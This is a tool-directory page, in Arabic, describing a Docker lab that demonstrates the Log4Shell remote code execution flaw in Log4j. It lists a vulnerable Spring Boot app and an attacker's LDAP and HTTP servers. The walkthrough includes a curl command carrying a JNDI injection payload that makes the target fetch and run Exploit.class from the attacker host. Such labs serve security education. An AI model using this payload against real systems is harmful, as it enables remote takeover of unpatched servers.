Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44228_Log4Shell — عرض استغلال RCE قائم على Docker لـ Log4Shell (CVE-2021-44228) مع تطبيق Spring Boot ضعيف وخادم LDAP خبيث وتسليم الحمولة عبر حقن JNDI. | Kitploit
أدوات/GitHubGitHub/vutiendat323/cve-2021-44228_log4shell
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubvutiendat323/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

عرض استغلال RCE قائم على Docker لـ Log4Shell (CVE-2021-44228) مع تطبيق Spring Boot ضعيف وخادم LDAP خبيث وتسليم الحمولة عبر حقن JNDI.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
2منذ 4 أشهرلم تتم المراجعة بعد
مشاركة

عرض توضيحي لاستغلال ثغرة Log4Shell (CVE-2021-44228)

يحاكي هذا المشروع سيناريو هجوم تنفيذ الأوامر عن بُعد (RCE) عبر ثغرة Log4Shell في مكتبة Apache Log4j 2.

المكونات

  1. vulnerable-app: تطبيق Spring Boot يستخدم Log4j 2.14.1.
  2. attacker: يحتوي على خادم LDAP خبيث (marshalsec) وخادم HTTP يخدم ملف الشيفرة الخبيثة Exploit.class.

طريقة التنفيذ

1. تشغيل البيئة

يتطلب تثبيت Docker و Docker Compose.

root@kitploit:~
docker compose up --build

انتظر حتى يصبح كلا الحاويتين جاهزين. سيعمل vulnerable-app على المنفذ 8080.

2. تنفيذ الهجوم

افتح طرفية جديدة وأرسل طلباً يحتوي على حمولة JNDI عبر الترويسة X-Api-Version:

root@kitploit:~
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/

3. التحقق من النتائج

  • افحص سجل الحاوية vulnerable-app. ستلاحظ أن الحمولة قد تم تسجيلها.
  • افحص سجل الحاوية attacker. ستلاحظ أن اتصال LDAP تم توجيهه إلى خادم HTTP.
  • التحقق من RCE: تحقق مما إذا كان الملف /tmp/pwned قد أُنشئ داخل الحاوية vulnerable-app:
root@kitploit:~
docker exec -it vulnerable-app ls -la /tmp/pwned

إذا كان الملف موجوداً، فهذا يثبت أنه تم تنفيذ الشيفرة الخبيثة Exploit.class بنجاح!

تحذير

هذا المشروع لأغراض تعليمية وبحثية في مجال الأمن فقط. يُمنع منعاً باتاً استخدامه لأغراض غير قانونية.

تنزيل الأداة